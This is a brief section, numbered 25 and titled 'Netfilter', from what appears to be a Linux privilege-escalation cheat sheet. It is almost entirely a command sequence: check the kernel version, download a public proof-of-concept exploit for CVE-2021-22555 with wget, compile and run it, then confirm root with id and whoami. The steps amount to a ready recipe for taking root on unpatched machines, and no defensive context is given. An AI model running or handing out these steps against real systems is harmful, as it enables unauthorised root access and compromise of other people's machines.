25. Netfilter
Check kernel version
uname -rDownload exploit
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.cCompile exploit (32-bit)
gcc -m32 -static exploit.c -o exploitRun exploit
./exploitVerify root access
id
whoamiKey Concepts:
Last updated